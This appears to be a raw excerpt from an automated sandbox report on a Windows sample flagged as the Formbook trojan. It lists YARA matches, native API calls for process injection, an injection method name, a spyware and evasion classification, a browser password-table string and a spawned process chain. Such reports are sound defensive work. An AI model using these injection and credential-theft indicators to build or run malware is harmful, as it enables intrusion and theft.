              Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_0042B533 NtClose,3_2_0042B533
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2B60 NtClose,LdrInitializeThunk,3_2_012E2B60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_012E2DF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_012E2C70
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E35C0 NtCreateMutant,LdrInitializeThunk,3_2_012E35C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E4340 NtSetContextThread,3_2_012E4340
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E4650 NtSuspendThread,3_2_012E4650
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2BA0 NtEnumerateValueKey,3_2_012E2BA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2B80 NtQueryInformationFile,3_2_012E2B80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2BE0 NtQueryValueKey,3_2_012E2BE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2BF0 NtAllocateVirtualMemory,3_2_012E2BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2AB0 NtWaitForSingleObject,3_2_012E2AB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2AF0 NtWriteFile,3_2_012E2AF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2AD0 NtReadFile,3_2_012E2AD0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2D30 NtUnmapViewOfSection,3_2_012E2D30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2D00 NtSetInformationFile,3_2_012E2D00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2D10 NtMapViewOfSection,3_2_012E2D10
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2DB0 NtEnumerateKey,3_2_012E2DB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2DD0 NtDelayExecution,3_2_012E2DD0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2C00 NtQueryInformationProcess,3_2_012E2C00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2C60 NtCreateKey,3_2_012E2C60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2CA0 NtQueryInformationToken,3_2_012E2CA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2CF0 NtOpenProcess,3_2_012E2CF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2CC0 NtQueryVirtualMemory,3_2_012E2CC0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2F30 NtCreateSection,3_2_012E2F30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2F60 NtCreateProcessEx,3_2_012E2F60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2FA0 NtQuerySection,3_2_012E2FA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2FB0 NtResumeThread,3_2_012E2FB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2F90 NtProtectVirtualMemory,3_2_012E2F90
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2FE0 NtCreateFile,3_2_012E2FE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2E30 NtWriteVirtualMemory,3_2_012E2E30
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2EA0 NtAdjustPrivilegesToken,3_2_012E2EA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2E80 NtReadVirtualMemory,3_2_012E2E80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E2EE0 NtQueueApcThread,3_2_012E2EE0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E3010 NtOpenDirectoryObject,3_2_012E3010
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E3090 NtSetValueKey,3_2_012E3090
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E39B0 NtGetContextThread,3_2_012E39B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E3D10 NtOpenProcessToken,3_2_012E3D10
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe, Code function: 3_2_012E3D70 NtOpenThread,3_2_012E3D70
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04814650 NtSuspendThread,LdrInitializeThunk,14_2_04814650
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04814340 NtSetContextThread,LdrInitializeThunk,14_2_04814340
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04812CA0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812C60 NtCreateKey,LdrInitializeThunk,14_2_04812C60
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04812C70
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812DD0 NtDelayExecution,LdrInitializeThunk,14_2_04812DD0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04812DF0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04812D10
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04812D30
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04812E80
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04812EE0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812FB0 NtResumeThread,LdrInitializeThunk,14_2_04812FB0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812FE0 NtCreateFile,LdrInitializeThunk,14_2_04812FE0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812F30 NtCreateSection,LdrInitializeThunk,14_2_04812F30
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812AD0 NtReadFile,LdrInitializeThunk,14_2_04812AD0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812AF0 NtWriteFile,LdrInitializeThunk,14_2_04812AF0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04812BA0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04812BE0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04812BF0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812B60 NtClose,LdrInitializeThunk,14_2_04812B60
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_048135C0 NtCreateMutant,LdrInitializeThunk,14_2_048135C0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_048139B0 NtGetContextThread,LdrInitializeThunk,14_2_048139B0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812CC0 NtQueryVirtualMemory,14_2_04812CC0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812CF0 NtOpenProcess,14_2_04812CF0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812C00 NtQueryInformationProcess,14_2_04812C00
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812DB0 NtEnumerateKey,14_2_04812DB0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812D00 NtSetInformationFile,14_2_04812D00
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812EA0 NtAdjustPrivilegesToken,14_2_04812EA0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812E30 NtWriteVirtualMemory,14_2_04812E30
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812F90 NtProtectVirtualMemory,14_2_04812F90
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812FA0 NtQuerySection,14_2_04812FA0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812F60 NtCreateProcessEx,14_2_04812F60
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812AB0 NtWaitForSingleObject,14_2_04812AB0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04812B80 NtQueryInformationFile,14_2_04812B80
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04813090 NtSetValueKey,14_2_04813090
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04813010 NtOpenDirectoryObject,14_2_04813010
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04813D10 NtOpenProcessToken,14_2_04813D10
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_04813D70 NtOpenThread,14_2_04813D70
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_005B8120 NtAllocateVirtualMemory,14_2_005B8120
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_005B7CF0 NtCreateFile,14_2_005B7CF0
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_005B7E50 NtReadFile,14_2_005B7E50
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_005B7F30 NtDeleteFile,14_2_005B7F30
              Source: C:\Windows\SysWOW64\chkntfs.exe, Code function: 14_2_005B7FC0 NtClose,14_2_005B7FC0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059CB6814_2_0059CB68
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059CD9014_2_0059CD90
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AE1014_2_0059AE10
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AF5514_2_0059AF55
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AFE914_2_0059AFE9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A34F014_2_005A34F0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FC11C14_2_045FC11C
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FB18814_2_045FB188
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FBC6714_2_045FBC67
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FBD8314_2_045FBD83
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 012F7E54 appears 111 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0131EA12 appears 86 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0129B970 appears 277 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 012E5130 appears 58 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0132F290 appears 105 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04815130 appears 58 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0484EA12 appears 86 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04827E54 appears 111 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0485F290 appears 105 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 047CB970 appears 277 times
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1239382924.000000000099E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1241401720.000000000390E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000000.1229629788.00000000003E8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250425384.0000000006B30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250744676.00000000072F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1240108906.0000000002788000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCHKNTFS.EXEj% vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.000000000139D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe Binary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 8hd98EhtIFcYkb8.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: EuOdzX7Ehz6t1H3[1].exe.14.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aj34fjqh.exe.14.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, A297vOAUIe0qEnXTYd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, A297vOAUIe0qEnXTYd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs Security API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, A297vOAUIe0qEnXTYd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.28f4678.4.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
              Source: 0.2.8hd98EhtIFcYkb8.exe.68c0000.7.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
              Source: 0.2.8hd98EhtIFcYkb8.exe.2915848.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/5@16/14
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8hd98EhtIFcYkb8.exe.log
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Mutant created: NULL
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
              Source: C:\Windows\SysWOW64\chkntfs.exe File created: C:\Users\user~1\AppData\Local\Temp\j77tfG6
              Source: 8hd98EhtIFcYkb8.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
              Source: C:\Windows\SysWOW64\chkntfs.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: chkntfs.exe, 0000000E.00000003.1615124311.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3694875633.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615970676.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615970676.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3694875633.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615187319.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 8hd98EhtIFcYkb8.exe ReversingLabs: Detection: 28%
              Source: unknown Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Process created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe Process created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe Section loaded: apphelp.dll
